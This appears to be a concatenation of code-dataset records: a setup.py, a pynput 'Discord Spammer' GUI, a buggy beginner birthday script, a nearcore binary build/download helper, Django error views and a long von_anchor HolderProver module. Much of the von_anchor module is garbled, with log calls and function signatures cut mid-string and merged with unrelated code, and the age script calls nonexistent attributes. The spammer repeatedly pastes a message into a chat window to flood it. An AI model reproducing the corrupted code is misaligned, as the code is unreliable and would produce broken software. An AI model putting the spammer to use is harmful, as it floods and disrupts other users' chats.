"usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 303, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 305, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 311, "usage_type": "call"}, {"api_name": "pieces.pawn.cPawn", "line_number": 323, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 329, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 330, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 335, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 336, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 338, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 345, "usage_type": "call"}, {"api_name": "pieces.bishop.cBishop", "line_number": 348, "usage_type": "call"}, {"api_name": "pieces.rook.cRook", "line_number": 351, "usage_type": "call"}, {"api_name": "pieces.queen.cQueen", "line_number": 354, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 360, "usage_type": "call"}, {"api_name": "helper.reverse_lookup", "line_number": 375, "usage_type": "call"}, {"api_name": "match.is_opening", "line_number": 390, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 391, "usage_type": "call"}, {"api_name": "match.board", "line_number": 393, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 394, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 397, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 398, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 401, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 402, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 405, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 406, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 409, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 410, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 413, "usage_type": "attribute"}, {"api_name": "match.board", "line_number": 414, "usage_type": "attribute"}, {"api_name": "match.is_soft_pin", "line_number": 439, "usage_type": "call"}, {"api_name": "match.is_soft_pin", "line_number": 446, "usage_type": "call"}, {"api_name": "match.do_move", "line_number": 452, "usage_type": "call"}, {"api_name": "pieces.king.cKing", "line_number": 453, "usage_type": "call"}, {"api_name": "match.undo_move", "line_number": 455, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 492, "usage_type": "call"}, {"api_name": "match.color_of_piece", "line_number": 493, "usage_type": "call"}, {"api_name": "match.is_soft_pin", "line_number": 540, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 582, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 585, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 591, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 595, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 601, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 605, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 611, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 615, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 621, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 625, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 631, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 635, "usage_type": "call"}, {"api_name": "match.readfield", "line_number": 641, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 661, "usage_type": "call"}]} +{"seq_id": "6523972302", "text": "from setuptools import setup\nimport unittest\n\ndef para_test_suite():\n test_loader = unittest.TestLoader()\n test_suite = test_loader.discover('tests', pattern='test_*.py')\n return test_suite\n\nsetup(name='para',\n version='2.0.1',\n author='Migdalo',\n license='MIT',\n packages=['para'],\n test_suite='setup.para_test_suite',\n entry_points={\n 'console_scripts': [\n 'para = para.para:process_arguments'\n ]\n },\n zip_safe=True)\n\n", "repo_name": "Migdalo/para", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 494, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "unittest.TestLoader", "line_number": 5, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "41898045274", "text": "from pynput.keyboard import Key, Controller\r\nimport time\r\nimport clipboard\r\n\r\nfrom tkinter import *\r\n# Packages\r\ngui = Tk()\r\n\r\n\r\ngui.geometry(\"800x300\")\r\ngui.resizable(width=False, height=False)\r\ngui.title('Discord Spammer')\r\n# GUI\r\n\r\ndef getTextInput():\r\n result = text_box.get(\"1.0\",\"end\")\r\n clipboard.copy(result)\r\n# Text Input Value Command\r\n\r\ndef startSpamming():\r\n time.sleep(4)\r\n for _ in range(15):\r\n keyboard = Controller()\r\n with keyboard.pressed(Key.ctrl):\r\n keyboard.press('v')\r\n keyboard.release('v')\r\n keyboard.press(Key.enter)\r\n keyboard.release(Key.enter)\r\n time.sleep(0.5)\r\n\r\n# Main Spamming Command\r\n\r\n\r\nbtn = Button(gui, text = 'Copy Text', bg = 'gray', width = 20, height = 3, command = getTextInput)\r\nbtn.pack()\r\nbtn.place(x=340, y=130)\r\n# Copies a text\r\n\r\nbtn = Button(gui, text = 'Start Spam', bg = 'green', width = 40, height = 5, command = startSpamming)\r\nbtn.pack()\r\nbtn.place(x=270, y=200)\r\n# Start Spam Button\r\n\r\ntext_box = Text(\r\n gui,\r\n height=2,\r\n width=100,\r\n font=(\"Arial\", 32\r\n))\r\n\r\ntext_box.pack()\r\n# Text Box\r\n\r\ngui.mainloop()\r\n\r\n# Project by Fr0das\r\n# Project by Fr0das\r\n# Project by Fr0das", "repo_name": "Fr0das/discord-spammer", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1208, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "clipboard.copy", "line_number": 17, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 21, "usage_type": "call"}, {"api_name": "pynput.keyboard.Controller", "line_number": 23, "usage_type": "call"}, {"api_name": "pynput.keyboard.Key.ctrl", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 24, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.enter", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 27, "usage_type": "name"}, {"api_name": "pynput.keyboard.Key.enter", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 28, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "20548852206", "text": "print ('hi stupid')\nf_name = input('Whats your first name: ')\nl_name = input('How about a last name: ')\nborn_month = input(' What day of the month were you born?: ')\nborn_day = input('And the month?: ')\nborn_year = input('year?: ')\nprint('Hey ',f_name,l_name,' so your birthday is ',born_month, ' / ',born_day, '/',born_year)\nfrom datetime import date\ntoday = date.year \nprint (date.year )\ncalculate_age = today.year - born_year - ((today.month,today.day) < (born_month,born._day))\ntoday = date.today\n \n \n", "repo_name": "Kukukachuj/cti110", "sub_path": "Messingaround.py", "file_name": "Messingaround.py", "file_ext": "py", "file_size_in_byte": 505, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.date.year", "line_number": 9, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 9, "usage_type": "name"}, {"api_name": "datetime.date.year", "line_number": 10, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 10, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 12, "usage_type": "attribute"}, {"api_name": "datetime.date", "line_number": 12, "usage_type": "name"}]} +{"seq_id": "7671268003", "text": "import os\nimport pathlib\nimport subprocess\nimport sys\nimport tempfile\nimport typing\n\nimport semver\nfrom configured_logger import logger\nfrom github import Github\n\n\ndef current_branch():\n return os.environ.get('BUILDKITE_BRANCH') or subprocess.check_output([\n \"git\", \"rev-parse\", \"--symbolic-full-name\", \"--abbrev-ref\", \"HEAD\"\n ]).strip().decode()\n\n\ndef get_releases():\n git = Github(None)\n repo = git.get_repo(\"nearprotocol/nearcore\")\n releases = []\n\n for release in repo.get_releases():\n try:\n # make sure that the version provided is a valid semver version\n version = semver.VersionInfo.parse(release.title)\n releases.append(release)\n except Exception as e:\n pass\n\n return sorted(releases,\n key=lambda release: semver.VersionInfo.parse(release.title),\n reverse=True)\n\n\ndef latest_rc_branch():\n releases = list(\n filter(\n lambda release: (semver.VersionInfo.parse(release.title).prerelease\n or \"\").startswith(\"rc\"), get_releases()))\n\n if not releases:\n return None\n\n return semver.VersionInfo.parse(releases[0].title).finalize_version()\n\n\nclass Executables(typing.NamedTuple):\n root: pathlib.Path\n neard: pathlib.Path\n state_viewer: pathlib.Path\n\n def node_config(self) -> typing.Dict[str, typing.Any]:\n return {\n 'local': True,\n 'neard_root': self.root,\n 'binary_name': self.neard.name\n }\n\n\ndef _compile_binary(branch: str) -> Executables:\n \"\"\"For given branch, compile binary.\n\n Stashes current changes, switches branch and then returns everything back.\n \"\"\"\n # TODO: download pre-compiled binary from github for beta/stable?\n prev_branch = current_branch()\n stash_output = subprocess.check_output(['git', 'stash'])\n subprocess.check_output(['git', 'checkout', str(branch)])\n subprocess.check_output(['git', 'pull', 'origin', str(branch)])\n result = _compile_current(branch)\n subprocess.check_output(['git', 'checkout', prev_branch])\n if stash_output != b\"No local changes to save\\n\":\n subprocess.check_output(['git', 'stash', 'pop'])\n return result\n\n\ndef escaped(branch):\n return branch.replace('/', '-')\n\n\ndef _compile_current(branch: str) -> Executables:\n \"\"\"Compile current branch.\"\"\"\n subprocess.check_call(['cargo', 'build', '-p', 'neard', '--bin', 'neard'])\n subprocess.check_call(['cargo', 'build', '-p', 'near-test-contracts'])\n subprocess.check_call(['cargo', 'build', '-p', 'state-viewer'])\n branch = escaped(branch)\n build_dir = pathlib.Path('../target/debug')\n neard = build_dir / f'neard-{branch}'\n state_viewer = build_dir / f'state-viewer-{branch}'\n (build_dir / 'neard').rename(neard)\n (build_dir / 'state-viewer').rename(state_viewer)\n return Executables(build_dir, neard, state_viewer)\n\n\ndef download_file_if_missing(filename: pathlib.Path, url: str) -> None:\n \"\"\"Downloads a file from given URL if it does not exist already.\n\n Does nothing if file `filename` already exists. Otherwise, downloads data\n from `url` and saves them in `filename`. Downloading is done with `curl`\n tool and on failure (i.e. if it returns non-zero exit code) `filename` is\n not created. On success, the file’s mode is set to 0x555 (i.e. readable and\n executable by anyone).\n\n Args:\n filename: Path to the file.\n url: URL of the file to download (if the file is missing).\n \"\"\"\n if filename.exists():\n if not filename.is_file():\n sys.exit(f'{filename} exists but is not a file')\n return\n\n proto = '\"=https\"' if os.uname()[0] == 'Darwin' else '=https'\n cmd = ('curl', '--proto', proto, '--tlsv1.2', '-sSfL', url)\n name = None\n try:\n with tempfile.NamedTemporaryFile(dir=filename.parent,\n delete=False) as tmp:\n name = pathlib.Path(tmp.name)\n subprocess.check_call(cmd, stdout=tmp)\n name.chmod(0o555)\n name.rename(filename)\n name = None\n finally:\n if name:\n name.unlink()\n\n\ndef download_binary(uname, branch):\n \"\"\"Download binary for given platform and branch.\"\"\"\n logger.info(f'Getting near & state-viewer for {branch}@{uname}')\n outdir = pathlib.Path('../target/debug')\n basehref = ('https://s3-us-west-1.amazonaws.com/build.nearprotocol.com'\n f'/nearcore/{uname}/{branch}/')\n neard = outdir / f'neard-{branch}'\n state_viewer = outdir / f'state-viewer-{branch}'\n download_file_if_missing(neard, basehref + 'neard')\n download_file_if_missing(state_viewer, basehref + 'state-viewer')\n return Executables(outdir, neard, state_viewer)\n\n\nclass ABExecutables(typing.NamedTuple):\n stable: Executables\n current: Executables\n\n\ndef prepare_ab_test(stable_branch):\n # Use NEAR_AB_BINARY_EXISTS to avoid rebuild / re-download when testing locally.\n #if not os.environ.get('NEAR_AB_BINARY_EXISTS'):\n # _compile_current(current_branch())\n # uname = os.uname()[0]\n # if stable_branch in ['master', 'beta', 'stable'] and uname in ['Linux', 'Darwin']:\n # download_binary(uname, stable_branch)\n # else:\n is_nayduck = bool(os.getenv('NAYDUCK'))\n\n if is_nayduck:\n # On NayDuck the file is fetched from a builder host so there’s no need\n # to build it.\n root = pathlib.Path('../target/debug/')\n current = Executables(root, root / 'neard', root / 'state-viewer')\n else:\n current = _compile_current(current_branch())\n\n try:\n stable = download_binary(os.uname()[0], stable_branch)\n except Exception:\n if is_nayduck:\n sys.exit('RC binary should be downloaded for NayDuck.')\n stable = _compile_binary(str(stable_branch))\n return ABExecutables(stable=stable, current=current)\n", "repo_name": "MinnMinn/near-core", "sub_path": "pytest/lib/branches.py", "file_name": "branches.py", "file_ext": "py", "file_size_in_byte": 5936, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ.get", "line_number": 14, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 14, "usage_type": "call"}, {"api_name": "github.Github", "line_number": 20, "usage_type": "call"}, {"api_name": "semver.VersionInfo.parse", "line_number": 27, "usage_type": "call"}, {"api_name": "semver.VersionInfo", "line_number": 27, "usage_type": "attribute"}, {"api_name": "semver.VersionInfo.parse", "line_number": 33, "usage_type": "call"}, {"api_name": "semver.VersionInfo", "line_number": 33, "usage_type": "attribute"}, {"api_name": "semver.VersionInfo.parse", "line_number": 40, "usage_type": "call"}, {"api_name": "semver.VersionInfo", "line_number": 40, "usage_type": "attribute"}, {"api_name": "semver.VersionInfo.parse", "line_number": 46, "usage_type": "call"}, {"api_name": "semver.VersionInfo", "line_number": 46, "usage_type": "attribute"}, {"api_name": "typing.NamedTuple", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 54, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 54, "usage_type": "attribute"}, {"api_name": "subprocess.check_output", "line_number": 69, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 70, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 71, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 73, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 75, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 85, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 86, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 87, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 89, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 112, "usage_type": "call"}, {"api_name": "os.uname", "line_number": 115, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 119, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 121, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 122, "usage_type": "call"}, {"api_name": "configured_logger.logger.info", "line_number": 133, "usage_type": "call"}, {"api_name": "configured_logger.logger", "line_number": 133, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 134, "usage_type": "call"}, {"api_name": "typing.NamedTuple", "line_number": 144, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 157, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 162, "usage_type": "call"}, {"api_name": "os.uname", "line_number": 168, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 171, "usage_type": "call"}]} +{"seq_id": "36762020096", "text": "from django.shortcuts import render, render_to_response\nfrom django.template import RequestContext\nfrom django.views.generic.base import TemplateView\n\nfrom braces.views import SetHeadlineMixin\n\nclass IndexView(SetHeadlineMixin, TemplateView):\n headline = 'Home Page'\n template_name = 'index.html'\n\n\ndef handler404(request):\n response = render_to_response('error/base.html', {'error_code': 404},\n context_instance=RequestContext(request))\n response.status_code = 404\n return response\n\n\ndef handler500(request):\n response = render_to_response('error/base.html', {'error_code': 500},\n context_instance=RequestContext(request))\n response.status_code = 500\n return response", "repo_name": "aaronlelevier/django-payasyougo", "sub_path": "payg/payg/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 706, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "braces.views.SetHeadlineMixin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.views.generic.base.TemplateView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 13, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 14, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 20, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "25292478842", "text": "import json\nimport logging\n\nfrom os import listdir, makedirs\nfrom os.path import basename, expanduser, isdir, isfile, join\nfrom time import time\nfrom typing import Set, Union\n\nfrom indy import anoncreds, ledger\nfrom indy.error import IndyError, ErrorCode\nfrom von_anchor.anchor.base import _BaseAnchor\nfrom von_anchor.cache import Caches, RevoCacheEntry, CRED_DEF_CACHE, REVO_CACHE, SCHEMA_CACHE\nfrom von_anchor.codec import canon_wql\nfrom von_anchor.error import (\n AbsentCred,\n AbsentCredDef,\n AbsentInterval,\n AbsentLinkSecret,\n AbsentRevReg,\n AbsentSchema,\n AbsentTails,\n BadIdentifier,\n BadRevStateTime,\n CacheIndex,\n ClosedPool,\n CredentialFocus)\nfrom von_anchor.nodepool import NodePool\nfrom von_anchor.tails import Tails\nfrom von_anchor.util import (\n cred_def_id2seq_no,\n ok_cred_def_id,\n ok_rev_reg_id,\n ok_schema_id,\n prune_creds_json,\n rev_reg_id2cred_def_id_tag)\nfrom von_anchor.validate_config import validate_config\nfrom von_anchor.wallet import Wallet\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass HolderProver(_BaseAnchor):\n \"\"\"\n Mixin for anchor acting in the role of w3c Holder and indy-sdk Prover. A Holder holds\n credentials; a Prover produces proof of credentials. Revocation support requires\n the holder-prover anchor to manage tails files.\n \"\"\"\n\n def __init__(self, wallet: Wallet, pool: NodePool, cfg: dict = None) -> None:\n \"\"\"\n Initializer for HolderProver anchor. Retain input parameters; do not open wallet nor tails writer.\n\n :param wallet: wallet for anchor use\n :param pool: pool for anchor use\n :param cfg: configuration dict for cache archive behaviour; e.g.,\n\n ::\n\n {\n 'parse-cache-on-open': True\n 'archive-cache-on-close': True,\n }\n\n \"\"\"\n\n LOGGER.debug('HolderProver.__init__ >>> wallet: %s, pool: %s, cfg: %s', wallet, pool, cfg)\n\n super().__init__(wallet, pool)\n self._link_secret = None\n\n self._dir_tails = join(expanduser('~'), '.indy_client', 'tails')\n makedirs(self._dir_tails, exist_ok=True)\n\n self._cfg = cfg or {}\n validate_config('holder-prover', self._cfg)\n\n self._dir_cache = join(expanduser('~'), '.indy_client', 'cache', self.wallet.name)\n makedirs(self._dir_cache, exist_ok=True)\n\n LOGGER.debug('HolderProver.__init__ <<<')\n\n def _assert_link_secret(self, action: str):\n \"\"\"\n Raise AbsentLinkSecret if link secret is not set.\n\n :param action: action requiring link secret\n \"\"\"\n\n if self._link_secret is None:\n LOGGER.debug('HolderProver._assert_link_secret: action %s requires link secret but it is not set', action)\n raise AbsentLinkSecret('Action {} requires link secret but it is not set'.format(action))\n\n @property\n def cfg(self) -> dict:\n \"\"\"\n Accessor for configuration dict\n\n :return: holder-prover config dict\n \"\"\"\n\n return self._cfg\n\n @cfg.setter\n def cfg(self, value: dict) -> None:\n \"\"\"\n Set configuration dict\n\n :param value: configuration dict\n \"\"\"\n\n self._cfg = value or {}\n validate_config('holder-prover', self._cfg)\n\n @property\n def dir_cache(self) -> str:\n \"\"\"\n Accessor for cache archive directory\n\n :return: holder-prover cache archive directory\n \"\"\"\n\n return self._dir_cache\n\n async def _sync_revoc(self, rr_id: str) -> None:\n \"\"\"\n Pick up tails file reader handle for input revocation registry identifier. If no symbolic\n link is present, get the revocation registry definition to retrieve its tails file hash,\n then find the tails file and link it.\n\n Raise AbsentTails for missing corresponding tails file.\n\n :param rr_id: revocation registry identifier\n \"\"\"\n\n LOGGER.debug('HolderProver._sync_revoc >>> rr_id: %s', rr_id)\n\n if not ok_rev_reg_id(rr_id):\n LOGGER.debug('HolderProver._sync_revoc (str, int):\n \"\"\"\n Build rev reg delta json, potentially starting from existing (earlier) delta.\n\n Return delta json and its timestamp on the distributed ledger.\n\n Raise AbsentRevReg for no such revocation registry, or BadRevStateTime for a requested delta to\n a time preceding revocation registry creation.\n\n :param rr_id: rev reg id\n :param to: time (epoch seconds) of interest; upper-bounds returned timestamp\n :param fro: optional prior time of known delta json\n :param fro_delta: optional known delta as of time fro\n :return: rev reg delta json and ledger timestamp (epoch seconds)\n \"\"\"\n\n LOGGER.debug(\n '_HolderProver._build_rr_delta_json >>> rr_id: %s, to: %s, fro: %s, fro_delta: %s',\n rr_id,\n to,\n fro,\n fro_delta)\n\n if not ok_rev_reg_id(rr_id):\n LOGGER.debug('HolderProver._build_rr_delta_json str:\n \"\"\"\n Build and return indy-sdk requested credentials json from input indy-sdk creds structure\n through specified filter.\n\n :param creds: indy-sdk creds structure or list of cred-briefs (cred-info + interval)\n :param filt: filter mapping cred def ids to:\n - (optionally) 'attr-match': dict mapping attributes to values (omit, empty dict, or None to match all);\n - (optionally) 'minima': (pred) integer lower-bounds of interest (omit, empty dict, or None to match all);\n omit parameter or specify empty dict or None for no filter, matching all; e.g.,\n\n ::\n\n {\n 'Vx4E82R17q...:3:CL:16:0': {\n 'attr-match': {\n 'name': 'Alex',\n 'sex': 'M',\n 'favouriteDrink': None\n },\n 'minima': { # if both attr-match and minima present, combined conjunctively (i.e., via AND)\n 'favouriteNumber' : 10,\n 'score': 100 # if more than one minimum present, combined conjunctively (i.e., via AND)\n }\n },\n 'R17v42T4pk...:3:CL:19:0': {\n 'attr-match': {\n 'height': 175,\n 'birthdate': '1975-11-15' # combined conjunctively (i.e., via AND)\n }\n },\n 'Z9ccax812j...:3:CL:27:0': {\n 'attr-match': {} # match all attributes on this cred def\n },\n '9cHbp54C8n...:3:CL:37:0': {\n 'minima': { # request all attributes on this cred def, request preds specifying employees>=50\n 'employees' : 50,\n }\n }\n ...\n }\n\n :param filt_dflt_incl: whether to request (True) all creds by attribute/predicate\n that filter does not identify by cred def, or (False) to exclude them. Note that\n if the filter is None or {}, this parameter is unnecessary - it applies to a filter,\n not a non-filter.\n :return: indy_sdk requested_credentials json for use in proof creation\n \"\"\"\n\n LOGGER.debug('HolderProver.build_req_creds_json >>> creds: %s, filt: %s', creds, filt)\n\n req_creds = {\n 'self_attested_attributes': {},\n 'requested_attributes': {},\n 'requested_predicates': {}\n }\n\n def _add_brief(brief, uuid, req_creds_key):\n nonlocal req_creds\n req_creds[req_creds_key][uuid] = {\n 'cred_id': brief['cred_info']['referent'],\n 'revealed': True\n }\n if brief.get('interval', None):\n req_creds[req_creds_key][uuid]['timestamp'] = brief['interval']['to']\n if req_creds_key == 'requested_attributes':\n req_creds[req_creds_key][uuid]['revealed'] = True\n\n if filt:\n for cd_id in filt:\n if not ok_cred_def_id(cd_id):\n LOGGER.debug('HolderProver.build_req_creds_json str:\n \"\"\"\n Return path to the correct directory for the tails file on input revocation registry identifier.\n\n :param rr_id: revocation registry identifier of interest\n :return: path to tails dir for input revocation registry identifier\n \"\"\"\n\n LOGGER.debug('HolderProver.dir_tails >>>')\n\n if not ok_rev_reg_id(rr_id):\n LOGGER.debug('HolderProver.dir_tails 'HolderProver':\n \"\"\"\n Explicit entry. Perform ancestor opening operations,\n then parse cache from archive if so configured, and\n synchronize revocation registry to tails tree content.\n\n :return: current object\n \"\"\"\n\n LOGGER.debug('HolderProver.open >>>')\n\n await super().open()\n if self.cfg.get('parse-cache-on-open', False):\n Caches.parse(self.dir_cache)\n\n for path_rr_id in Tails.links(self._dir_tails):\n await self._sync_revoc(basename(path_rr_id))\n\n LOGGER.debug('HolderProver.open <<<')\n return self\n\n async def close(self) -> None:\n \"\"\"\n Explicit exit. If so configured, populate cache to prove all creds in\n wallet offline if need be, archive cache, and purge prior cache archives.\n\n :return: current object\n \"\"\"\n\n LOGGER.debug('HolderProver.close >>>')\n\n if self.cfg.get('archive-cache-on-close', False):\n await self.load_cache(True)\n Caches.purge_archives(self.dir_cache, True)\n\n await super().close()\n for path_rr_id in Tails.links(self._dir_tails):\n rr_id = basename(path_rr_id)\n try:\n await self._sync_revoc(rr_id)\n except ClosedPool:\n LOGGER.warning('HolderProver sync-revoc on close required ledger for %s but pool was closed', rr_id)\n\n LOGGER.debug('HolderProver.close <<<')\n\n async def rev_regs(self) -> list:\n \"\"\"\n Return list of revocation registry identifiers for which HolderProver has associated tails files.\n The operation creates associations for any (newly copied, via service wrapper API) tails files without.\n\n :return: list of revocation registry identifiers for which HolderProver has associated tails files\n \"\"\"\n\n LOGGER.debug('HolderProver.rev_regs >>>')\n\n for path_rr_id in Tails.links(self._dir_tails):\n await self._sync_revoc(basename(path_rr_id))\n\n rv = [basename(f) for f in Tails.links(self._dir_tails)]\n LOGGER.debug('HolderProver.rev_regs <<< %s', rv)\n return rv\n\n async def offline_intervals(self, cd_ids: list) -> dict:\n \"\"\"\n Return default non-revocation intervals for input cred def ids, based on content of revocation cache,\n for augmentation into specification for Verifier.build_proof_req_json. Note that the close() call\n to set the anchor off-line extends all revocation cache registry delta entries to its time of execution:\n in this case, the intervals will all be single timestamps rather than (to, fro) pairs.\n\n Raise CacheIndex if proof request cites credential definition without corresponding\n content in cred def cache or revocation cache.\n\n :param cd_ids: list of credential definition identifiers\n :return: dict mapping revocable cred def ids to interval specifications to augment into cd_id2spec\n parameter for Verifier.build_proof_req_json(), and non-revocable cred def ids to empty dict; e.g.,\n\n ::\n\n {\n 'Vx4E82R17q...:3:CL:16:0': {\n 'interval': (1528111730, 1528115832)\n },\n 'R17v42T4pk...:3:CL:19:0': {},\n 'Z9ccax812j...:3:CL:27:0': {\n 'interval': (1528112408, 1528116008)\n },\n '9cHbp54C8n...:3:CL:37:0': {\n 'interval': 1528116426\n },\n '6caBcmLi33...:3:CL:41:0': {},\n ...\n }\n \"\"\"\n\n LOGGER.debug('HolderProver.offline_intervals >>> cd_ids: %s', cd_ids)\n\n rv = {}\n for cd_id in cd_ids:\n if not ok_cred_def_id(cd_id):\n LOGGER.debug('HolderProver.offline_intervals None:\n \"\"\"\n Create link secret (a.k.a. master secret) used in proofs by HolderProver.\n\n Raise any IndyError causing failure to set link secret in wallet.\n\n :param link_secret: label for link secret; indy-sdk uses label to generate link secret\n \"\"\"\n\n LOGGER.debug('HolderProver.create_link_secret >>> link_secret: %s', link_secret)\n\n try:\n await anoncreds.prover_create_master_secret(self.wallet.handle, link_secret)\n except IndyError as x_indy:\n if x_indy.error_code == ErrorCode.AnoncredsMasterSecretDuplicateNameError:\n LOGGER.info('HolderProver did not create link secret - it already exists')\n else:\n LOGGER.debug(\n 'HolderProver.create_link_secret: (str, str):\n \"\"\"\n Create credential request as HolderProver and store in wallet; return credential json and metadata json.\n\n Raise AbsentLinkSecret if link secret not set.\n\n :param cred_offer_json: credential offer json\n :param cd_id: credential definition identifier\n :return: cred request json and corresponding metadata json as created and stored in wallet\n \"\"\"\n\n LOGGER.debug('HolderProver.create_cred_req >>> cred_offer_json: %s, cd_id: %s', cred_offer_json, cd_id)\n\n if not ok_cred_def_id(cd_id):\n LOGGER.debug('HolderProver.create_cred_req str:\n \"\"\"\n Store cred in wallet as HolderProver, return its credential identifier as created in wallet.\n\n Raise AbsentTails if tails file not available for revocation registry for input credential.\n\n :param cred_json: credential json as HolderProver created\n :param cred_req_metadata_json: credential request metadata as HolderProver created via create_cred_req()\n :return: credential identifier within wallet\n \"\"\"\n\n LOGGER.debug(\n 'HolderProver.store_cred >>> cred_json: %s, cred_req_metadata_json: %s',\n cred_json,\n cred_req_metadata_json)\n\n cred = json.loads(cred_json)\n cred_def_json = await self.get_cred_def(cred['cred_def_id'])\n rr_id = cred['rev_reg_id']\n rrdef_json = None\n if rr_id:\n await self._sync_revoc(rr_id)\n rrdef_json = await self._get_rev_reg_def(rr_id)\n\n rv = await anoncreds.prover_store_credential(\n self.wallet.handle,\n None, # cred_id, let indy-sdk generate random uuid\n cred_req_metadata_json,\n cred_json,\n cred_def_json,\n rrdef_json)\n\n LOGGER.debug('HolderProver.store_cred <<< %s', rv)\n return rv\n\n async def load_cache(self, archive: bool = False) -> int:\n \"\"\"\n Load caches and archive enough to go offline and be able to generate proof\n on all credentials in wallet.\n\n Return timestamp (epoch seconds) of cache load event, also used as subdirectory\n for cache archives.\n\n :return: cache load event timestamp (epoch seconds)\n \"\"\"\n\n LOGGER.debug('HolderProver.load_cache >>> archive: %s', archive)\n\n rv = int(time())\n box_ids = json.loads(await self.get_box_ids_json())\n for s_id in box_ids['schema_id']:\n with SCHEMA_CACHE.lock:\n await self.get_schema(s_id)\n for cd_id in box_ids['cred_def_id']:\n with CRED_DEF_CACHE.lock:\n await self.get_cred_def(cd_id)\n for rr_id in box_ids['rev_reg_id']:\n await self._get_rev_reg_def(rr_id)\n with REVO_CACHE.lock:\n revo_cache_entry = REVO_CACHE.get(rr_id, None)\n if revo_cache_entry:\n try:\n await revo_cache_entry.get_delta_json(self._build_rr_delta_json, rv, rv)\n except 